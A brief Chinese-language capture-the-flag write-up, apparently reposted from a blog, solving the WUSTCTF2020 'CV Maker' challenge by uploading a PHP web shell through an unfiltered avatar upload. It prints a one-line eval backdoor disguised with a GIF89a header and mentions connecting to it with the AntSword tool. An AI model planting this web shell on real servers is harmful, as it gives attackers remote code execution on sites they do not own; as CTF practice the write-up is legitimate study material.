[WUSTCTF2020]CV Maker

[WUSTCTF2020]CV Maker

1.进去后看到有注册页面，先注册一个账号

2.登入后，直接放了一个明显的上传头像，怀疑是uploadloud

3.先看看有没有过滤，直接就传了个带后门的php文件

GIF89a   <script language='php'>@eval($_POST['hhz']);</script> 4.然后就上传成功了（没有过滤，大大滴好评）没有看到回显，然后看了下源码发现路径回显再这里了

 

5.蚁剑连接后根目录找到flag

 

 

标签：WUSTCTF2020,回显,CV,过滤,上传,Maker
来源： https://www.cnblogs.com/l0vehzzz/p/16438199.html